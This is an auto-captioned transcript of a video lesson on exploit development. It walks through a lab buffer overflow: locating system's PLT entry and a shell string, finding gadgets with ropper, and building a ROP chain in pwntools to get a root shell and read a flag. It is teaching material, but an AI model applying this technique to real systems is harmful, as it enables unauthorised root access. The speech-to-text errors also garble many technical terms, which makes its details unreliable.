1 00:00:00,210 --> 00:00:02,880 All right, so welcome back to Introduction to Expo Development. 2 00:00:02,920 --> 00:00:03,810 Let me check this course. 3 00:00:04,019 --> 00:00:05,040 Yes, it is. 4 00:00:05,550 --> 00:00:06,090 All right. 5 00:00:06,090 --> 00:00:13,860 So we're going to go for two one, which is basically if you read the write up I have on Google Docs, 6 00:00:13,950 --> 00:00:19,500 it's actually using a system called from the Bend date function. 7 00:00:21,420 --> 00:00:23,400 Let me see if I have the source code. 8 00:00:24,240 --> 00:00:27,180 Open source code. 9 00:00:28,770 --> 00:00:29,760 Oh, there we go. 10 00:00:31,920 --> 00:00:32,700 Yes. 11 00:00:33,780 --> 00:00:36,030 So shut up. 12 00:00:39,210 --> 00:00:47,690 So we're calling the show date function and as has a system level command and it runs then date. 13 00:00:47,700 --> 00:00:54,060 So the vulnerability is that we have to overflow the buffer, take control of the return structure pointer 14 00:00:54,060 --> 00:01:00,870 and do a drop chain to be able to call the this call right here. 15 00:01:01,170 --> 00:01:12,600 So first, I want you to go back and I want you to open the debugger using the debugger to load dash 16 00:01:12,600 --> 00:01:13,110 queue. 17 00:01:15,240 --> 00:01:24,000 So as you can see, we're using Jeff, we're not using we're not using debug or extension anymore. 18 00:01:24,120 --> 00:01:26,550 It's no longer supported. 19 00:01:27,000 --> 00:01:33,720 And I want you to disassemble this function right here. 20 00:01:34,410 --> 00:01:37,050 So disassemble show, underscore date. 21 00:01:38,130 --> 00:01:43,740 And I want you to take note of this memory address right here. 22 00:01:44,550 --> 00:01:49,230 So this is the procedure, a procedural linkage table entry. 23 00:01:50,160 --> 00:01:51,870 It makes a call to system. 24 00:01:54,270 --> 00:01:57,580 And normally, this is what I dragged out of the call. 25 00:01:57,600 --> 00:02:00,570 So now we disassemble this memory address. 26 00:02:03,360 --> 00:02:09,240 Now normally this is your got entry, which is your global offset table entry. 27 00:02:09,990 --> 00:02:18,780 So how dynamically linked a Esler protected bodies work is that it uses a method called lazy linking, 28 00:02:18,780 --> 00:02:26,190 which means it doesn't actually know where the system call is until you run it the first time. 29 00:02:26,310 --> 00:02:32,430 And then once it does that, once you run it for the first time, it resolves the address. 30 00:02:32,550 --> 00:02:40,230 So I know that this is the exact same memory address as this, but in many cases that you'll see out 31 00:02:40,230 --> 00:02:42,270 in the wild, this is not going to be the same. 32 00:02:42,270 --> 00:02:45,900 So be aware that you need to copy the memory address. 33 00:02:46,080 --> 00:02:47,250 That's right here. 34 00:02:47,250 --> 00:02:48,960 That makes the system call. 35 00:02:53,790 --> 00:02:57,780 So let's make this and add an entry to our exploit script. 36 00:02:58,830 --> 00:03:03,000 So let's say attempt to dot pi. 37 00:03:03,780 --> 00:03:05,490 Let's call it a call. 38 00:03:11,670 --> 00:03:15,990 And we also have a hardcoded shell in memory. 39 00:03:15,990 --> 00:03:19,730 So what we want to do is go back to Jeff. 40 00:03:19,740 --> 00:03:24,840 So we're going to use the Jeff features or Jeff actually want to use a Jeff features now. 41 00:03:27,540 --> 00:03:27,990 I'm sorry. 42 00:03:27,990 --> 00:03:31,920 I'm just looking at the write up and just multitasking. 43 00:03:32,340 --> 00:03:33,030 Let's see. 44 00:03:33,840 --> 00:03:37,140 So we're going to look for a search pattern 45 00:03:40,350 --> 00:03:41,040 shell. 46 00:03:43,100 --> 00:03:43,820 Oh, right. 47 00:03:43,910 --> 00:03:50,300 So what I'm press are we're out of control C out of it and then we're on a search pattern. 48 00:03:50,310 --> 00:03:56,870 Shell So there's a lot of things that start with the word shell. 49 00:03:57,530 --> 00:04:04,220 What's relevant is not what's within this outer range, which is actually A or C standard library, 50 00:04:04,280 --> 00:04:12,110 but we go all the way up and burn it, go into the binary range of our initialized binary, which is 51 00:04:12,110 --> 00:04:13,580 going to be this memory address. 52 00:04:13,610 --> 00:04:17,100 If you don't know what I'm talking about, let's go back now and type V map. 53 00:04:17,870 --> 00:04:27,350 So we want to search within this started from this address, any at this address right here. 54 00:04:28,160 --> 00:04:33,920 So we're going to look for a shell function within this memory address range. 55 00:04:35,300 --> 00:04:40,520 So we go up and this is our shell function. 56 00:04:40,970 --> 00:04:45,350 As you can see, the next byte or next to by is going to end F for B. 57 00:04:45,620 --> 00:04:47,990 So this is the beginning of the shell function. 58 00:04:47,990 --> 00:04:55,310 So we're going to take note of this two shell equals this memory address. 59 00:05:01,380 --> 00:05:03,330 Finally, we're going to go into ROPPER. 60 00:05:03,780 --> 00:05:05,580 So we're going to try ROPPER. 61 00:05:06,870 --> 00:05:07,280 All right. 62 00:05:07,410 --> 00:05:07,710 Sorry. 63 00:05:07,770 --> 00:05:11,610 That's the wrong container where you go. 64 00:05:12,090 --> 00:05:12,850 What this work is. 65 00:05:12,870 --> 00:05:13,830 Split the screen. 66 00:05:13,860 --> 00:05:22,470 We're going do ROPPER follow to bone, and we need to look for our final gadget's. 67 00:05:23,280 --> 00:05:31,080 So I want you to search for a pop RTI return, which, as you know from previous 64 bit Colin Conventions. 68 00:05:31,140 --> 00:05:38,940 It starts with the RTI Register, then the R.S. Register, then the register and then the RRB register 69 00:05:38,940 --> 00:05:41,850 for 64 call and conviction conventions. 70 00:05:42,240 --> 00:05:46,260 So we're going to look for search step one return. 71 00:05:47,250 --> 00:05:52,380 When I copy this memory address, that equals this. 72 00:05:54,810 --> 00:05:59,100 And then we're going to use search for pop RTI. 73 00:06:00,120 --> 00:06:04,020 And we have a conveniently a pop RTI return address right here. 74 00:06:06,180 --> 00:06:08,040 Pop RTI return. 75 00:06:15,900 --> 00:06:20,210 So at this point it's just another rinse and repeat kind of attack. 76 00:06:20,220 --> 00:06:26,190 So it's going to be buff equals bytes a times 208. 77 00:06:26,190 --> 00:06:36,810 Remember, take a note of this overwrite return based pointer buff plus equals B bytes 42 that's hexadecimal 78 00:06:36,810 --> 00:06:48,930 for B times eight equals overwrite returns stack pointer, the next bytes overwrite the return instruction 79 00:06:48,930 --> 00:06:52,140 pointer, and that's when we're going to land our option. 80 00:06:53,040 --> 00:07:02,160 So we're going to do is buff plus equals pack 64 RET and if I didn't document this before, what we're 81 00:07:02,160 --> 00:07:10,280 going to do is it's actually the same convenient last thing put on from LB Import Star. 82 00:07:10,290 --> 00:07:22,680 I'm sorry, we're using PO tools now, so it's just another way of saying strut crap, pack little in 83 00:07:24,570 --> 00:07:25,170 return. 84 00:07:25,770 --> 00:07:30,990 Or we could have just copy this memory address right here and just like that. 85 00:07:36,230 --> 00:07:42,350 So our next gadget is buff plus equals pack 64. 86 00:07:43,700 --> 00:07:45,740 Oh, actually, I'm sorry, 64. 87 00:07:45,770 --> 00:07:48,450 This is a 32 bit. 88 00:07:48,470 --> 00:07:49,700 You have to put a cube. 89 00:07:49,730 --> 00:07:50,420 I'm sorry. 90 00:07:52,710 --> 00:07:55,080 So Struck Pat could return. 91 00:07:56,730 --> 00:08:02,760 So in our previous video I said Capital L, capital L just means 32 bit. 92 00:08:03,120 --> 00:08:05,490 And capital Q means 64 bit. 93 00:08:05,700 --> 00:08:09,780 So Capital L is a memory address, a four bytes. 94 00:08:09,780 --> 00:08:14,040 Capital Q is a memory address of 6 to 8 bytes. 95 00:08:14,130 --> 00:08:21,030 Because in 64 bit computing, we don't actually use all 64 bits. 96 00:08:21,030 --> 00:08:24,750 We use somewhere between 48 to 64 bits. 97 00:08:24,750 --> 00:08:26,850 So that means 6 to 8 bytes. 98 00:08:27,990 --> 00:08:33,539 So now we're going to do our pop RTI return address. 99 00:08:35,890 --> 00:08:38,890 Above plus equals P 64. 100 00:08:40,990 --> 00:08:46,080 Shell buff plus equals p 64. 101 00:08:47,170 --> 00:08:47,950 This call. 102 00:08:51,230 --> 00:08:53,750 And then we're right back to the our buffer. 103 00:08:59,310 --> 00:09:05,820 So all it does is to even pipe the payload back into like a text file or something and then just have 104 00:09:05,820 --> 00:09:06,510 it read. 105 00:09:07,530 --> 00:09:12,750 So what we can do is we just call copy all of this. 106 00:09:13,400 --> 00:09:14,820 I'm sorry about the previous video. 107 00:09:14,820 --> 00:09:17,640 I didn't actually document that very well, 108 00:09:21,420 --> 00:09:23,140 but now we're going to open another screen. 109 00:09:23,160 --> 00:09:29,040 So, control, be shift five, then I'll attempt to tie. 110 00:09:34,280 --> 00:09:36,830 And once again, to pop the root shell. 111 00:09:36,830 --> 00:09:38,510 We're going to run the command. 112 00:09:38,690 --> 00:09:40,470 Python three a ten. 113 00:09:40,550 --> 00:09:41,030 Oops. 114 00:09:41,750 --> 00:09:53,000 Python three, the two pi semicolon semicolon, type two. 115 00:09:54,380 --> 00:09:55,250 Once again. 116 00:09:55,250 --> 00:10:05,780 So right now it executed datetime as you can see from our source code of two vol press. 117 00:10:05,780 --> 00:10:06,680 Enter again. 118 00:10:07,730 --> 00:10:10,520 ID who am I? 119 00:10:12,500 --> 00:10:13,230 Route. 120 00:10:13,850 --> 00:10:14,270 Flag. 121 00:10:14,570 --> 00:10:15,350 Text. 122 00:10:18,020 --> 00:10:19,700 And we could have read the flag. 123 00:10:19,700 --> 00:10:24,680 But I am not going to reveal the flag until our very last video, which is going to be the answer for 124 00:10:24,680 --> 00:10:25,460 your quiz.